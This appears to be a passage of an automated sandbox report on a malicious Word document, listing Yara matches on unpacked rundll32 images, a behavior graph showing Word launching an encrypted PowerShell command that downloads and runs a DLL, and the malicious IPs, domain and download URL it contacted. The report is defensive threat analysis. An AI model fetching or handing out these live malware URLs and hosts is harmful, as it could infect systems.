Source: Yara match File source: 12.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.190000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.230000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.190000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 344615 Sample: PO# 01222021.doc Startdate: 26/01/2021 Architecture: WINDOWS Score: 100 49 Multi AV Scanner detection for domain / URL 2->49 51 Antivirus detection for URL or domain 2->51 53 Multi AV Scanner detection for dropped file 2->53 55 15 other signatures 2->55 14 cmd.exe 2->14         started        17 WINWORD.EXE 293 26 2->17         started        process3 signatures4 63 Suspicious powershell command line found 14->63 65 Very long command line found 14->65 67 Encrypted powershell cmdline option found 14->67 19 powershell.exe 12 9 14->19         started        24 msg.exe 14->24         started        process5 dnsIp6 47 cab.mykfn.com 103.143.46.51, 49165, 80 NETMAGIC-APNetmagicDatacenterMumbaiIN India 19->47 45 C:\Users\user45k2duhbbehaviorgraphxlh9ia6_R.dll, PE32 19->45 dropped 59 Powershell drops PE file 19->59 26 rundll32.exe 19->26         started        file7 signatures8 process9 process10 28 rundll32.exe 26->28         started        process11 30 rundll32.exe 2 28->30         started        signatures12 69 Hides that the sample has been downloaded from the Internet (zone.identifier) 30->69 33 rundll32.exe 30->33         started        process13 process14 35 rundll32.exe 1 33->35         started        signatures15 57 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->57 38 rundll32.exe 35->38         started        process16 process17 40 rundll32.exe 1 38->40         started        signatures18 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 40->61 43 rundll32.exe 40->43         started        process19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
195.159.28.230
unknown Norway
2116 ASN-CATCHCOMNO true
69.38.130.14
unknown United States
26878 TWRS-NYCUS true
103.143.46.51
unknown India
17439 NETMAGIC-APNetmagicDatacenterMumbaiIN true

Contacted Domains

Name IP Active
cab.mykfn.com 103.143.46.51 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://cab.mykfn.com/admin/X/ true
  • 15%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown